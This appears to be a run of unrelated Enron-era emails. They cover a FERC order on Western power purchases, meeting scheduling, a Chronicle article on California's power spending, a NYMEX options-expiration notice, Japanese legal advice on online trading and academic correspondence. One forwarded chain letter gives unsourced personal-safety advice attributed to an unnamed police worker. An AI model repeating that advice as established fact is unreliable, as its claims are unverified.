I believe this was intended for the other Susan Scott...I'm with Nat Gas trading. Thanks -----Original Message----- From: Nicolay, Christi Sent: Monday, April 30, 2001 10:55 AM To: Scott, Susan Subject: WEST DESKS--FERC authorizes power marketers to purchase from industrials (and more) ---------------------- Forwarded by Christi L Nicolay/HOU/ECT on 04/30/2001 10:54 AM --------------------------- From: Christi L Nicolay 04/27/2001 11:01 AM To: Chris Lackey/PDX/ECT@ECT, Christopher F Calger/PDX/ECT@ECT, Tim Belden/HOU/ECT@ECT, Don Black/HOU/EES@EES, Jeff Golden/HOU/EES@EES, Marc Pana/HOU/EES@EES, Paul Kaufman/PDX/ECT@ECT, Alan Comnes/PDX/ECT@ECT, Ray Alvarez/NA/Enron@ENRON, Susan J Mara/NA/Enron@ENRON, Steve Walton/HOU/ECT@ECT, Richard Shapiro/NA/Enron@Enron, James D Steffes/NA/Enron@Enron, Joe Hartsoe/Corp/Enron@ENRON, Donna Fulton/Corp/Enron@ENRON, Sarah Novosel/Corp/Enron@ENRON, Jeff Brown/NA/Enron@Enron, Sheila Tweed/HOU/ECT@ECT, Christian Yoder/HOU/ECT@ECT, Jeffrey T Hodge/HOU/ECT@ECT, James E Keller/HOU/EES@EES, Vicki Sharp/HOU/EES@EES, Ozzie Pagan/Enron@EnronXGate, Leslie Lawner/NA/Enron@Enron, Joy Werner/Corp/Enron@ENRON, Karen A Cordova/HOU/EES@EES, Robert Frank/NA/Enron@Enron, Janet R Dietrich/HOU/EES@EES, Harry Kingerski/NA/Enron@Enron cc: Subject: WEST DESKS--FERC authorizes power marketers to purchase from industrials (and more) On March 14, 01, FERC issued an "Order removing obstacles to increased electric generation and gas supply in the West.." (Docket No. EL01-47). Most significantly, FERC authorizes industrials in WSCC to sell power to licensed power marketers (like EPMI and EES) effective 3/14/01 through 12/31/01. The industrial does not have to obtain its own power marketer license from FERC (subject to EPMI and EES making filings for the industrials). (This is similar to the authorization that EPMI and EES requested nationwide earlier this year -- we should hear from FERC on that request by mid-May.) In addition, FERC authorizes DSM sales at wholesale at market based rates. Specifics: Owners of generating facilities located at business locations in the WSCC and used primarily for back-up for self-generation (who will be "public utilities" subject to the Federal Power Act only while they sell at wholesale) can sell power at wholesale from such facilities to non-affiliated entities (like EPMI or EES) without prior notice under section 205 of FPA (would usually require 60 day advance notice filing). -- Waives certain parts of the filing requirements for the industrial; however, the industrial will still be subject to shortened filing requirements for dispositions of facilities and interlocking positions while they are selling at wholesale. -- EPMI and EES will make the FERC quarterly filings on behalf of the industrials for any of these purchases. Our report must show the names of the industrial; aggregate amount of capacity and/or energy purchased from each seller; and the aggregate compensation paid to each seller. Accounting/commercial folks for EPMI and EES-- please make sure these purchases are flagged in the accounting system, since the report will be separate from our big quarterly reports. -- This does not authorize the retail industrial customer to violate any rules or tariffs of its host utility. This does not authorize an industrial to resell power it purchases (only can sell what it generates); unless otherwise allowed (or not precluded) by its retail tariff -- must file a rate schedule at FERC for this, but FERC will be receptive to granting waivers and authorizations. -- This authorization expires after 12/31/01. Effective 3/14/01 through 12/31/01, retail customers in WSCC, as permitted by state laws and regulations, and wholesale customers are authorized to reduce consumption for the purpose of reselling their load reduction at wholesale at market-based rates. These transactions can occur in several ways: An aggregator can line up retail load to acquire enough negawatts to resell in a manner similar to what aggregators do when they sell power to retail load under retail choice programs. In addition, wholesale and retail load with contract demand service could resell their contract demands if the value of power is greater than the value of consumption. Similar quarterly reports would be due by EPMI/EES. NOTE: the industrial still has to obtain the interconnection agreement with transmission provider (may need new interconnection facilities, etc.) Remember that you still need to get transmission on OASIS when the power is wheeled away from the industrial. Other initiatives in the order: Utilities are encouraged to make DSM arrangements with wholesale customers. FERC waives the prior notice requirement for amended contracts that are required to be filed at FERC. Clarifies that DSM should be treated consistenly with all other types of incremental and out-of-pocket costs for utilities. Reminds transmission providers to keep ATCs current, including CBM and TRM. Provides incentive rates for new transmission projects that can be in service by July 1 (and to a lesser extent -- by November 1 of 01 and 02). Considers "rolled in" rates for generation interconnection (rather than direct assignment that we have now.) Extends temporary waivers through 12/31/01 of operating and efficiency standards for QFs. Allows QF to sell output above historical supply though a negotiated bilateral agreement at market based rates, if sold in California and the WSCC. FERC will review interconnection issues that impede generation from reaching load (ie, if a utility does not act within time limits on interconnection requests, etc.) Provides for increased staff and quicker gas pipeline additions review. Please let me know if you would like the order. Ray Alvarez (202-466-9170) and I (713-853-7007) can assist you with this. Thanks. <Embedded Picture (Device Independent Bitmap)>
sold! I'll initiate the call. -----Original Message----- From: Vince J Kaminski [mailto:[email protected]] Sent: Friday, June 30, 2000 3:44 PM To: [email protected] Cc: Vince J Kaminski Subject: RE: Pre-meeting Weathereffects site cruise Ed, Thursday works for me. What about 10:30 my time? Vince "Edward Krapels" <[email protected]> on 06/30/2000 02:43:00 PM Please respond to <[email protected]> To: "'Vince J Kaminski'" <[email protected]> cc: Subject: RE: Pre-meeting Weathereffects site cruise how about Thursday, July 6? -----Original Message----- From: Vince J Kaminski [mailto:[email protected]] Sent: Friday, June 30, 2000 3:29 PM To: [email protected] Cc: Vince J Kaminski Subject: RE: Pre-meeting Weathereffects site cruise Ed, A correction. I shall spend an entire day at PRC (performance review) on Friday, July 7. Can we do on another day Vince "Edward Krapels" <[email protected]> on 06/30/2000 12:40:59 PM Please respond to <[email protected]> To: "'Vince J Kaminski'" <[email protected]> cc: Subject: RE: Pre-meeting Weathereffects site cruise I'll still be here in Boston so we'd do it over the phone. OK? -----Original Message----- From: Vince J Kaminski [mailto:[email protected]] Sent: Friday, June 30, 2000 12:11 PM To: [email protected] Cc: Vince J Kaminski Subject: Re: Pre-meeting Weathereffects site cruise Ed, Will you be in Houston on that day or we shall do it over the phone? Vince "Edward Krapels" <[email protected]> on 06/30/2000 09:13:04 AM Please respond to <[email protected]> To: "'Vince J Kaminski'" <[email protected]> cc: "Jeffrey Shorter \(E-mail\)" <[email protected]> Subject: Pre-meeting Weathereffects site cruise Vince, How about a pre-meeting web site cruise on Friday, July 7 at 11AM EDT? Ed -----Original Message----- From: Vince J Kaminski [mailto:[email protected]] Sent: Friday, June 30, 2000 9:52 AM To: [email protected] Cc: Vince J Kaminski Subject: RE: Next visit to Houston Ed, July 12, 2:30 it is. I would like the pre-meeting site cruise. How can we arrange it? Vince "Edward Krapels" <[email protected]> on 06/30/2000 04:00:53 AM Please respond to <[email protected]> To: "'Vince J Kaminski'" <[email protected]> cc: "Jeffrey Shorter \(E-mail\)" <[email protected]> Subject: RE: Next visit to Houston Vince, We're all set for 2:30 on July 12. How about a pre-meeting web site cruise on Friday, July 7 at 11AM EDT? Ed -----Original Message----- From: Vince J Kaminski [mailto:[email protected]] Sent: Thursday, June 29, 2000 5:04 PM To: [email protected] Cc: Vince J Kaminski; Shirley Crenshaw Subject: RE: Next visit to Houston Ed, Wednesday, July 12, 2:300 will work for me. I shall be glad to review your website -- www.weathereffects.com. I shall invite some people who work on electricity in my group to join me. Vince "Edward Krapels" <[email protected]> on 06/29/2000 03:53:40 PM Please respond to <[email protected]> To: "'Vince J Kaminski'" <[email protected]> cc: "Jeffrey Shorter \(E-mail\)" <[email protected]> Subject: RE: Next visit to Houston Vince, Good to hear from you and I'm glad you're available. How is Wednesday at 2:30? I did look at EOL and am not surprised to see its quality. I was unable to say much about it in my Risk Electricity Hedging and Trading report because of deadline pressures. How is the site doing? I am intrigued by the competition for trading platforms and was astonished to hear that Goldman, Morgan, BP and Shell were going to launch a site to compete with yours. Talk about a shotgun marriage! If we have time next week, I could step you through our website -- www.weathereffects.com. I'm very proud of what we've done. I can't give out a password yet but would be happy to walk through the site with you over the phone using my password. It's a very ambitious site -- with state-of-the-art WSI weather (seasonal, 6-10, and day to day) driving a good load model for PJM and NEPOOL. ESAI contributes oil and gas input price forecasts, capacity judgments, and "herding" ideas to develop power price forecasts for same time periods. After one month's full-bore effort, I'm pleased with the results (e.g., we forecast Nepool onpeak to be $43 and it turned out $46). Have a great weekend. Ed -----Original Message----- From: Vince J Kaminski [mailto:[email protected]] Sent: Wednesday, June 28, 2000 5:29 PM To: [email protected] Cc: Vince J Kaminski; Shirley Crenshaw Subject: Re: Next visit to Houston Ed, I shall be available on both days. What about Wednesday, July 12, between 1:30 and 4:00. Please, let me know what time would work for you. It will be nice to see you again. Vince P.S. By the way, did you have a chance to take a look at the EOL? "Edward Krapels" <[email protected]> on 06/28/2000 02:49:41 PM Please respond to [email protected] To: Vince J Kaminski/HOU/ECT@ECT cc: Subject: Next visit to Houston Dear Vince, I will be returning to Houston during the week of July 10. ESAI and Weather Services International have launched -- after more than 18 months of R&D -- our service, called Energycast Power Trader and Energycast Gas Trader, for power traders in Nepool and PJM. I would be happy to review the service with you as well as take you on a tour of our web site. Are you available on July 12 - 13? Sincerely, Ed Krapels
State's Power Purchases Costlier Than Projected Tab is $6 million a day over Davis' requests Lynda Gledhill, Chronicle Sacramento Bureau Friday, March 16, 2001 ,2001 San Francisco Chronicle Sacramento -- California has spent about $6 million more a day buying electrical power than originally projected, according to a confidential document obtained yesterday by The Chronicle. State power buyers spent $2.7 billion between Jan. 17 and March 11, averaging $49 million a day. That amounts to about $6 million a day more than lawmakers figured using Gov. Gray Davis' appropriations requests. The confidential document was prepared by the Department of Water Resources, which purchases power on behalf of the state. It was handed to a group of lawmakers in a subcommittee hearing Wednesday by Water Resources Director Tom Hannigan. To the public, the document presents the first day-by-day look at how much California is spending on power purchases. Although the document shows more money being spent than originally believed, it didn't startle any of the handful of senators and Assembly members who saw it. "I don't think it was a surprise," said Assemblyman Dick Dickerson, R- Redding. Although the state is supposed to recoup the money spent on electricity, analysts and lawmakers say the open spigot on the state's treasury could jeopardize the state budget and fiscal well-being in the short and long term. For example, the state's power spending could jeopardize new education programs and transportation projects. The nonpartisan Legislative Analyst warned last month that lawmakers shouldn't count on all the new projects in Davis' proposed budget. Also, California has already been placed on a watch list by several credit rating firms, because of the deep debt that could be incurred in helping the utilities become financially stable. The watch list typically precedes a credit rating drop, which would cause the state's interest on bonds and loans to rise. "This (power purchasing) has a dampening effect," said Jean Ross, executive director of the California Budget Project, an independent policy group that tracks state spending. "Nobody knows where the economy is going, and how the energy crisis will affect it, so no one will know what the revenues will look like in the future." The biggest day of power buying happened on Feb. 16 when the state spent nearly $81 million for electricity, or $435 per megawatt hour. The smallest day was March 10 when the state buyers spent $40 million, or $219 per megawatt hour. Michael Worm, an analyst with the investment firm Gerald Klauer Mattison & Co., said what the state paid was in line with current energy prices. "That's where energy prices more or less have been for quite some time," he said. "Of course, they are dramatically higher than they used to be." The governor's office has refused to release information on how much the state has spent, said Steve Maviglio, Davis' spokesman. Maviglio said if generators found out how much the state spent the day before, they could force up the price the next day. But Assemblyman Tony Strickland, R-Thousand Oaks, said the public had a right to know how its money way being spent. "People need to know exactly what it is costing to keep the lights on," he said. "We want to know the whole story -- not just pieces." Strickland, along with media organizations including The Chronicle, have filed public records act requests to obtain information on how much the state has spent, along with the details of long-term power contracts signed by Davis. The original bill that authorized the state to purchase power appropriated only $500 million, but allowed the governor to use up to $10 billion if needed for power purchases by notifying lawmakers. The governor's office has sent five letters since Feb. 5 to lawmakers notifying them that additional money was needed. Based on these letters, which in total have requested an additional $2.5 billion, the news media and lawmakers estimated that the state was spending $43 million a day -- $6 million less than the actual costs shown on the Water Resources document. Since the state began purchasing electricity, the health of its budget has become dependent on a variety of things to come, making it as fragile as a house of cards. The money spent on power is taken from the state's general fund and is supposed to be returned through the issuance of state bonds. The bonds will be paid for with a portion of the rates that utility customers pay every month. - Tell Us What You Think Can you save 20 percent on your energy usage? Gov. Gray Davis is offering rebates for Californians who save on power starting in June, and if you've got a strategy for conserving, The Chronicle wants to hear it. Contact the Energy Desk, San Francisco Chronicle, 901 Mission St., San Francisco, CA 94103; or e- mail [email protected]. -- E-mail Lynda Gledhill at [email protected]. Paying for Power These charts show what the state spent for electricity on the spot market and the average price paid. For the time frame of Jan. 17 through Feb. 14, only periodic totals and averages were given. Period Amount spent 9 p.m. Jan. 17 through Jan. 18 $13,595,121 Jan. 19 - 29 399,000,000 Jan. 29 - 31 136,546,472 Feb. 1 - 12 495,755,000 Feb. 12 - 14 152,087,316 Chronicle Graphic ,2001 San Francisco Chronicle ? Page?A - 11
Notice No. 00-373 November 8, 2000 TO: All NYMEX Division Members/Member Firms All NYMEX Division Clearing Members All NYMEX Division Floor Traders All NYMEX Division Operations Managers FROM: George Henderson, Vice President RE: Options Expiration Operational Procedures for the Trading Floor and Clearing Members ________________________________________________________________ The expiration date for the December 2000 options contract for Crude Oil (LOZ0) is Tuesday, November 14, 2000. GENERAL OPERATIONAL PROCEDURES All Clearing Members and Qualified Floor Traders that carried an options position as of the close of business day prior to the expiration day, or engaged in trading activity on Expiration Day in the expiring options contract will be required to have a knowledgeable, duly authorized representative present at their normal work station promptly at 5:30 p.m. until released by the Exchange staff as specified below. All adjustments and/or corrections, must be accompanied by relevant supporting documentation prior to being incorporated into expiration processing, in essence making the expiration processing an extension of the afternoon trade resolution procedures. All input to the NYMEX Clearing Department will conclude no later than 30 minutes after floor representatives are released. Exchange Clearing (299-2110), Floor Trade Correction (299-2068 and 299-2169) personnel, as well as a representative of the Floor Committee will be available to assist with the processing of notices of Exercise and Abandonment, position transfers, trade corrections and other questions or problems you may have. CLEARING DEPARTMENT OPERATIONAL PROCEDURES The Option Expiration process is a screen based process for which all information is provided on the screens on C21 terminals. No Option Expiration Reports will be provided. The following screens will assist you through the Option Expiration process: MEMBER TRADE INQUIRY Contains real-time top day trade information, trade information for the previous 4 business days and trades adjusted for the previous 4 business days by adjustment date. SINGLE POSITION MAINTENANCE Contains a real-time snapshot for each option series from the start of day position to the projected end of day position. REVIEW ACCEPT REJECT TRANSFERS Contains all trade and position transfers "TO" your firm and the status of each transfer. REVIEW SUBMITTED TRANSFERS Contains all trade and position transfer "FROM" your firm and the status of each transfer. EXERCISE NOTICE SUBMISSION Contains your available long position and an input field to enter the number of long positions you wish to exercise. DO NOT EXERCISE SUBMISSION Contains your available long position and an input field to enter the number of long positions you wish to abandon. POSITION CHANGE SUBMISSION PCS may be submitted either by manual input or by electronic transmission. Any PCS input on a Clearing 21 terminal will be the input processed by the system. This input may be made at any time prior to 7:10 p.m. Any PCS input via transmission for that contract series will be disregarded. ALL POSITIONS ARE DEEMED FINAL Upon completion of all PCS input, all positions will be deemed final. EXERCISE/ASSIGNMENT INFORMATION Will be available to you on the Single Position Maintenance window by contract series or the Assignment List window which contains all your Assignments on one window. You will be notified of its availability by C21 E-Mail and by Fast Facts. This should occur within 1 hour of the last PCS input. All Clearing Members are required to have an authorized representative(s) at their C21 workstations in preparation for any communication during the expiration process. FAST FACTS Clearing Members should call the Fast Facts information service 301-4871, access code 700 for event messages advising Members of the event status. E-MAIL Clearing Members should read their C21 E-Mail messages immediately to be aware of event status. The standard event Fast Facts and/or E-Mail messages and the sequence in which they will be announced are: Standard Event Message: Announce Out-of-the Money Exercise and In-the-Money Do Not Exercise Submissions Approximate Time of Message Availability: 5:45 PM Usual Event Time: 5:45 PM Announced via Fast Facts Standard Event Message: Announce Final Input to C21 Cutoff Time Approximate Time of Message Availability: 6:55 PM Usual Event Time: 7:10 PM Announced via e-mail Standard Event Message: All positions are deemed final Approximate Time of Message Availability: 7:10 PM Usual Event Time: 7:10 PM Announced via Fast Facts Standard Event Message: Announce Exercise/Assignment Information Available on the Single Position Maintenance Windows Approximate Time of Message Availability: 8:25 PM Usual Event Time: 8:30 PM Announced via Fast Facts and e-mail Standard Event Message: All Report Distribution is completed Approximate Time of Message Availability: 11:00 PM Usual Event Time: 11:00 PM Announced via Fast Facts The times appearing in the Usual Event Time column are based on normal operational conditions and could vary. NYMEX EXPIRATION DAY PROCESSING OVERVIEW OF MEMBER REQUIREMENTS Time: 5:30 PM Activity: Exercise Notice Submission Event: Input to C21 Cutoff Time Reference Number: 1 Time: 5:30 PM Activity: Do Not Exercise Submission Event: Input to C21 Cutoff Time Reference Number: 2 Time: 5:45 PM Activity: Announce Out-of-the-Money Exercise and In-the-Money Do Not Exercise Submissions Event: Fast Facts Notice Reference Number: 3 Time: 6:55 PM Activity: Announce Final Input to C21 Cutoff Time Event: C21 E-mail Reference Number: 4 Time: 7:10 PM Activity: Final Input to C21 Cutoff Time Reference Number: 5 Time: 7:10 PM Activity: All Positions are Deemed Final Event: Fast Facts Notice Reference Number: 6 Time: 8:25 PM Activity: Announce Exercise/Assignment Information Available on the Single Position Maintenance Windows Event: Fast Facts Notice and C21 E-mail Reference Number: 7 If you have any questions concerning these procedures, please contact Charles V. Bebel at 299-2130, Angel Rivera at 299-2150 or Anthony Di Benedetto at 299-2152 prior to the expiration date. __________________________________________________ Please click on the link below to indicate you have received this email. "[email protected]& refdoc=(00-373)" Note: If you click on the above line and nothing happens, please copy the text between the quotes, open your internet browser, paste it into the web site address and press Return.
---------------------- Forwarded by Judy Hernandez/HOU/ECT on 02/03/2000 11:23 AM --------------------------- From: Andrea R Guillen 01/19/2000 11:08 AM Sent by: Andrea R Guillen To: Maria Sandoval/HOU/ECT@ECT, Melissa Rodriguez/HOU/ECT@ECT, Elizabeth Soto/HOU/ECT@ECT, Cecilia Olvera/HOU/ECT@ECT, Melba Lozano/HOU/ECT@ECT, Pamela Sonnier/HOU/ECT@ECT, Phenicia Olivier/HOU/ECT@ECT, Rosa Jaramillo/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Kori Loibl/HOU/ECT@ECT, Cassandra S Dutton/HOU/ECT@ECT, Hannah Ortiz/HOU/ECT@ECT, Chantelle Villanueva/HOU/ECT@ECT, Alisha Guerrero/HOU/ECT@ECT, Judy Hernandez/HOU/ECT@ECT, [email protected] cc: Subject: FW: FW: For all my women friends( ---------------------- Forwarded by Andrea R Guillen/HOU/ECT on 01/19/2000 11:06 AM --------------------------- Margaret Smith <[email protected]> on 01/19/2000 10:40:58 AM To: "'Adam'" <[email protected]>, Andrea R Guillen/HOU/ECT@ECT, "'Bill'" <[email protected]>, "'Charlene'" <[email protected]>, "'David C'" <[email protected]>, "'Doug'" <[email protected]>, "'Glenn'" <[email protected]>, "'Gloria'" <[email protected]>, "'Imo Gene'" <[email protected]>, "'Laura'" <[email protected]>, "'Lisa'" <[email protected]>, "'Mykel'" <[email protected]>, "'Olivia'" <[email protected]>, "'Paula'" <[email protected]>, "'Ruth'" <[email protected]>, "'Stephani'" <[email protected]>, April Leger <[email protected]>, Dianna Bailey <[email protected]>, Dayna Dryden <[email protected]>, Janet Price <[email protected]>, Beth Friend <[email protected]>, Velma Birks <[email protected]>, Vickie Tonn <[email protected]> cc: Subject: FW: FW: For all my women friends( > >> From a woman who works in a police department: > >> > >> > >> I have to share some things I have learned in my job > >> with you. > >> > >> In my job, I review criminal and psychiatric files of > >> imprisoned sex offenders who are approaching their > >> release date. I decide if they are likely to re-offend > >> based on certain criteria and then civilly commit them > >> to a sex offender treatment facility if I decide that > >> they are at significant risk to re-offend > >> > >> I have read hundreds and hundreds of files, and have > >> taken note of some of the mistakes women make. Let me > >> preface this by saying that a woman is NEVER EVER EVER > >> at fault for being raped or attacked, but there are > >> definitely ways to reduce your risk of being a victim. > >> > >> Here are the most common mistakes women make that > >> could result in them getting kidnapped, attacked, > >> and/or raped: > >> > >> 1. Getting into the attacker's car when he pulls a > >> gun and orders you to get into his vehicle. > >> > >> Most attackers don't want to shoot you ... they want > >> you to get into the car so that they can drive you to > >> a deserted place and torture you. Don't comply. Run > >> screaming. It is MUCH more likely than not that he > >> will just move on to an easier target. > >> > >> 2. Pulling over when a man drives alongside of you > >> pointing at your car pretending something is wrong. > >> > >> If this happens, drive to the nearest well-lit and > >> populated gas station and look the car over yourself > >> (or ask an attendant). Never pull over. Believe it > >> or not, many women have fallen for this for fear of > >> their car spontaneously exploding in the middle of the > >> road. Not likely. > >> > >> 3. Not locking your doors while driving. > >> > >> I have read several cases where the attacker simply > >> walks up to a woman's car while she's at a traffic > >> light and jumps in with his gun or knife drawn. > >> > >> 4. Opening your front door when you have not > >> positively identified who is there. > >> > >> If you don't have a peep hole, get one. I've seen > >> countless cases where the attacker gains access to his > >> victims simply by knocking on their door. > >> > >> Don't let an attacker get into your home. He then has > >> a private, relatively soundproof place to attack you. > >> > >> 5. Not being alert in parking lots. > >> > >> If you go to the grocery store at night, don't be shy > >> about asking for an escort to your car. Too many > >> women are abducted from parking lots or even raped in > >> the parking lot. > >> > >> Look in your back seat before entering your car. Cars > >> provide endless hiding places for attackers, both > >> inside them and in between them. > >> > >> Be aware of your surroundings by looking to the left > >> and right and behind you with your head up all the > >> time. You may appear paranoid and look funny to > >> others, but an attacker will think twice about > >> approaching someone who appears so aware of what's > >> going on. > >> > >> 6. Trusting a clean cut, honest looking stranger. > >> > >> I see mug shots of every sex offender in the state of > >> Florida. They do not look like monsters. They often > >> look like they could be your friendly grocer, bank > >> teller, waiter, neighbor, clergy, doctor, etc. They > >> are every age between 15 and 90, and probably beyond. > >> Only a small minority actually look scary. > >> > >> I just read a case yesterday of a man with only one > >> leg who beat up his victim with his crutch before he > >> raped her. Who would have ever thought that a > >> one-legged man could be a rapist? > >> > >> 7. Trusting people to be alone with your children. > >> > >> This is a difficult one, because child molesters end > >> up being the LAST person the parents would believe is > >> the molester. > >> > >> Most of the child molesting cases I see involve the > >> stepfather, the uncle, the sister's boyfriend, the > >> mother's boyfriend, the grandfather, the baby-sitter, > >> the neighbor, the family friend, the youth camp > >> director, day care worker, etc. Although rare, even > >> women can be molesters. > >> > >> In every case, the perpetrator is a nice guy, > >> trusting, good with children, and the family is > >> baffled or even in disbelief that the person could be > >> abusing their child. > >> > >> When it comes to your children and grandchildren, be > >> suspicious of everyone, no matter who they are. And > >> pay attention to what your child says and how he/she > >> reacts to the mention of different people in their > >> lives. > >> > >> I didn't mean to make anyone uncomfortable with this, > >> but I am at work right now reviewing files, and > >> realized that this email is a way I can reach many > >> women at one time. I have the dirty job of reading > >> all these files, and it makes me feel good to know > >> that I can share some inferences from what I have > >> learned. This is not an exhaustive list of what not > >> to do, but just some things that I have observed more > >> than just a few times. > >> > >> Pass this on to the women in your lives > > > > > > > > > > > > > > > >
Dear Mark: I refer to you e-mail of March 3 sent to my partner, Paul Davis. I am in charge of our Information Technology/E-Commerce Dept. Please accept my apology for not having responded earlier. Please see our comments below. Should you have any questions, please let us know. Best regards, Yasuyoshi Goto > -----Original Message----- > From: Mark Taylor [mailto:[email protected]] > Sent: Friday, March 03, 2000 9:17 AM > To: [email protected] > Cc: Alan Aronowitz > Subject: EnronOnline in Japan > > > > > Dear Paul: > > I believe Alan Aronowitz and Mark Haedicke of our office met > with you a week or > so ago and mentioned that we would need advice from you > regarding the use of our > internet trading website with customers in Japan. Below is a > list of initial > questions regarding which we would be grateful for the > benefit of your advice. > For your background information as you consider these > questions, be advised that > counterparties must sign a written "Password Application" > which provides that > the counterparty intends to be bound by agreements entered > into by "clicking" in > the appropriate spaces on the website. Please feel free to > contact me with any > questions you may have. I can be reached either by e-mail at > [email protected] or by telephone at (713)853-7459. > > 1. Have relevant regulators in your jurisdiction made any > statements regarding > marketing of or dealing in any of the following types of > products through the > internet or other electronic systems: > > Commodity transactions relating to oil, gas, electricity > or other energy > commodities, whether derivative > transactions (cash settled) or physically settled. > Financial derivatives - i.e. interest rate, foreign > exchange or credit > derivatives. > Weather derivatives. > If so, please could you provide us with a brief summary. Our research has revealed no statements of regulators in Japan in connection with the marketing or dealing in the above types of products through the internet or other electronic systems from publicly available source. We will let you know if we find any previous or future statements. > > 2. Do any specific laws or regulations exist in your > jurisdiction which would > prevent or in any way impact upon marketing or trading of any > of the products > set out in question 1 above through the internet? In > answering this question > please address issues relating to contractual formation and > enforceability of > contracts entered into via the internet. In particular, if a > transaction > entered into via the internet is enforceable under U.S. or > U.K. law and the > transactions contain a choice of such law, will such > transactions, including the > choice of law, be enforceable in Japan? We do not have any specific laws or regulations which would marketing or trading of any of the products set out in question 1 above through the internet. Under Japanese law, formation of any contract does not require any formality. Japanese law generally does not require any formalities for offers or acceptances to be valid as such. There is no Statute of Frauds, and parties may make most types of contracts orally. If there is enough evidence establishing that the offeree agreed to the terms offered, an offeror may rely on it. In most simple sales contracts for consumer goods, for example, it would be easy to prove that the customer agreed to pay x yen for product Y. The Seller's electronic records showing that the customer clicked on the icon to buy product Y should be enough in this context. In more complicated contracts, the structure of the seller's Web pages should be carefully designed. Having no court decisions, we have no definite answer to the question of enforceability of shrink-wrap agreements in Japan. However, the legal implications of the Web-wrap, the online version of shrink-wrap, may be somewhat different from shrink-wraps (e.g. licenses for software sold over the counter). Under a typical shrink-wrap license in the real world, for example, the customer cannot break the wrapper until after the customer purchases the product. However, in an on-line environment, a customer has a choice to click on an Accept-to-Buy icon before the customer purchases the product. Further, with a carefully compiled sequence of screens or pages which would in effect be able to let the customer read the terms and conditions before rushing to click on the icon, it would be easier to prove that the customer read the terms and conditions than in a typical shrink-wrap license situation. Unlike shrink-wrap in the real world, the seller may obtain an electronic record showing that the customer clicked on the icon. Given these differences, the result possibly may be more favorable to sellers online than to those using shrink-wrap licenses. If a transaction entered into via the internet is enforceable under U.S. or U.K. law and the transactions contain a choice of such law, such transactions, including the choice of law, will be enforceable in Japan. > > 3. If the answer to either of question 1 or 2 is "yes", > please indicate > whether the impact of any relevant statements, laws or > regulations will differ > depending upon whether (a) the relevant internet site is > maintained in your > jurisdiction or elsewhere; or (b) the party effecting the > marketing/trading > through the internet is locally licensed. N/A > 4. Please confirm that by marketing to or trading with > counterparts in your > jurisdiction via the internet local relevant regulatory > bodies/local laws or > regulations will not consider the party maintaining the > relevant website to have > established a physical establishment/branch in your jurisdiction. We do not have any clear cut answer to this since we have no relevant laws, regulations, or court cases. So long as the party maintains the relevant website with a computer server located outside Japan, the likelihood of Japanese regulatory bodies to consider that the party maintaining such website established a "physical" establishment/branch in Japan is negligible. > > Thank you in advance for your attention. We look forward to > hearing from you. > > Sincerely, > > Mark Taylor > >
Bernard, My coordinates: Vincent Kaminski Managing Director - Research Enron Corp. 1400 Smith Street Room EB1962 Houston, TX 77002-7361 Phone: (713) 853 3848 (713) 410 5396 (cell) Fax : (713) 646 2503 E-mail: [email protected] Yes, we are going into a very interesting summer both here and in the UK. Vince "Murphy, Bernard" <[email protected]> on 03/27/2001 01:23:04 AM To: "'[email protected]'" <[email protected]> cc: Subject: RE: Thesis on Electricity Price Jump-Diffusions Hi Vince, Can you e-mail me your mailing address in Houston and I will send you a hard copy of the above today. Apologies for delay, but I wanted to ensure that Les Clewlow had received his copy in Sydney before distributing any other copies. Incidentally, today (March 27th) is a red letter day in the UK as the NETA / new electricity trading arrangements have gone 'live'. Should be interesting to observe the development of the paper market in the coming months - you're no doubt aware that IPE have just launched an electricity futures contract. Regards Bernard -----Original Message----- From: [email protected] [mailto:[email protected]] Sent: 01 March 2001 15:37 To: Murphy, Bernard Cc: [email protected]; [email protected] Subject: RE: 1997 Risk paper on Pricing of Electricity Derivatives Bernard, Yes, I can read a DVI file. You can also cc my home address: [email protected]. I shall try to send you an answer to your question on weekend. Vince "Murphy, Bernard" <[email protected]> on 03/01/2001 09:18:58 AM To: "'[email protected]'" <[email protected]> cc: Subject: RE: 1997 Risk paper on Pricing of Electricity Derivatives Vince, I can send you a Scientific Word DVI file (at the weekend) if you can read SCientific Word files ? The dissertation hasn't been reviewed by Les or the External yet - although its been at FORC for 2 months. I think that the Empirical Chapter is probably the one which would be of most relevance to both our company's businesses - although I ultimately didn't have the time to 'explicitly' price the jump risk-premium which I conjectured is possibly implicit in the prices of exchange-traded electricity futures-options - rather I developed an implicit estimation procedure which will enable a rough assessment (with a little bit of further work, but not too much) be made of the price of jump risk in wholesale power markets. In other words, I assumed spot jump-risk to be undiversifiable, and essentially devoted 2 Theoretical Chapters to : 1) proving that a jump-diffusion trading model is "incomplete" (synthesising the securities markets framework with martingale representation theory) - note that I did not assume that markets could be dynamically completed with 'term structure' securities as in the HJM w/ jumps papers of Shirakawa and Das and; 2) deriving an explicit risk-adjustment process for 'implementing' the price of jump-risk using a jump-diffusion marginal indirect utility of wealth process (ie. a jump-augmented production economy approach in the spirit of CIR, Bates, Ahn & Thompson). Incidentally, I would be keen to find out if you or any of your team done much work on real-asset valuations in a spark-spread option-valuation framework ? I'm about to start a project evaluation of embedded optionality, and have a dilemna whether I should model the spot or forward gas / power price processes. With the former, I can model mean-reversion and jumps explicitly (obviously, important for capturing the optionality of out-of-the-money plant, which might otherwise be ignored in a pure-diffusion framework) but am not maximising the informational content of the available market data (that is, assuming there was a long-term market forward curve for electricity); whereas in the latter the driftless forward supposition means that I have to capture mean-reversion via the futures volatility function, and jumps are less easy to calibrate. Any suggestions ? Regards Bernard -----Original Message----- From: [email protected] [mailto:[email protected]] Sent: 01 March 2001 14:54 To: Murphy, Bernard Cc: [email protected]; [email protected] Subject: Re: 1997 Risk paper on Pricing of Electricity Derivatives Bernard, I am forwarding your message to my assistant and she will mail you a reprint. I would be glad to take a look at your dissertation. Is it available as a publication, working paper? Vince "Murphy, Bernard" <[email protected]> on 03/01/2001 02:17:39 AM To: "'[email protected]'" <[email protected]> cc: Subject: 1997 Risk paper on Pricing of Electricity Derivatives Hello Vince, My name is Bernard Murphy - I received your e-mail address from Les Clewlow, who was my PhD supervisor at the Financia Options Research Centre at Warwick Business School. I've just finished my PhD on Electricity Price Jump Diffusions : A Theoretical and Empirical Study in Incomplete Markets - hence my interest in electricity price modelling and derivative pricing. I was looking to get hold of a copy of your 1997 paper, which has recently come to my attention : "The Challenge of Pricing & Risk-Managing Electricity Derivatives", The US POwer Market, Risk Publications, pp. 149-171. and Les suggested that I contact you directly (Les is travelling at present and doesn't have an electronic copy available) to request an e-copy. Incidentally, I am Lecturer in Finance / Financial Mathematics at University of Limerick (Ireland) and have taken a 